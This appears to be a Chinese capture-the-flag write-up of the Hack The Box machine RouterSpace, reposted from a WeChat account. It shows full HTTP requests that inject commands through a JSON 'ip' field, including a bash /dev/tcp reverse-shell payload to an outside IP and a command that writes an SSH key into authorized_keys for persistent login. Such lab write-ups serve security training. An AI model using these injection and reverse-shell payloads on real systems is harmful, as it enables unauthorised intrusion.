一、信息收集
0x01 端口扫描
nmap -sS -sV -O 10.10.11.148
0x02 访问web服务
发现是一个路由器,进行目录爆破。
0x03 目录爆破
很遗憾,没有发现有用的目录。
0x04 下载app
0x05 抓取app的数据包
但是没有返回包,进行IP和域名绑定。
0x06 绑定域名
vi /etc/hosts10.10.11.148 routerspace.htb
0x07 进行抓包
注意:这块有一个小tips,由于我是在MAC电脑上使用模拟器进行抓包,但是如果直接在VPN中抓包是不能获取到返回包的,因此需要在本地进行一次端口转发。
如下:
ew_MacOS -s ssocksd -l 6666
然后在brup中进行配置
然后就可以抓到返回包了
0x08 执行命令
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 23Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate{"ip":"0.0.0.0|whoami"}
但是有些命令不能执行,如ifconfig等。
0x09 尝试反弹shell
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate{"ip":"0.0.0.0|bash -c 'exec bash -i &>/dev/tcp/10.10.14.43/4444 <&1'"}
无法反弹shell
0x10 写入公钥
(1):生成公钥
选择默认即可
ssh-keygen
(2):将id_rsa.pub的内容保存为authorized_keys
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate{"ip":"0.0.0.0|echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDO/6c27YdZ4odas9oIrYo8i6V84BPhrAzuXGvRKW+62sB9U5tHt2unGOBBpt5r487/xP8YAqKGbpOcCMiOoZKMwQ5seyBEDrcoopXQ41F6V2UHDzQErZd/NwT5jLCgkELBikm3VGEWt4c/5GzrtKZSX+tzGTi9SUym+HKHxNOtWFzzNEbGuZWitlMDdlvfMH0oIGCO5W26pGKD60Xn6egLXItAsSmSmjqQgVtUjk3i1Krrd5jGeDlymHjc1wdKX9Gz70UQGMsZd1hRnrQQ5qSUlx0UibTEcsC758SlI8hyrt4cbRWcvGwn9zmMfg4eT9A9cpzGwR0AVh9J71ymMXaP6rIObR7h+3BDeASZZ8Bils4LNypuLDbQd5L3Y0iJ3MZpZtqRrHIeUQei49jluS5ERVXpt65hiG2oyO8lfrqOJYt4RX5nH9AGr/E3uoIz0fZETIm1JlgYdEsnoViySBMexfAc6EcLl8IugNBQSKwbPJtni+G8kE+Q4h5WX4JEhg0= root@kali2020' > /home/paul/.ssh/authorized_keys"}
(3):赋予700权限
POST /api/v4/monitoring/router/dev/check/deviceAccess HTTP/1.1accept: application/json, text/plain, */*user-agent: RouterSpaceAgentContent-Type: application/jsonContent-Length: 71Host: routerspace.htbConnection: closeAccept-Encoding: gzip, deflate{"ip":"0.0.0.0|chmod 700 /home/paul/.ssh/authorized_keys"}
二、获取权限
0x01 进行登陆
ssh [email protected] -i id_rsa
三、权限提升
0x01 使用整理的提权方法进行尝试
提权总结链接:https://github.com/wwl012345/Vuln-List/blob/main/Windows&Linux%E6%8F%90%E6%9D%83%E5%90%88%E9%9B%86.md
(1):从本地拷贝exp
scp local_file remote_username@remote_ip:remote_folder
(2):进行提权
四、复盘
0x01 下载apk
0x02 然后抓取数据包
0x03 进行命令拼接
0x04 使用ssh写入公钥
0x05 进行权限提升
原文始发于微信公众号(想走安全的小白):hackthebox--RouterSpace writeup
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论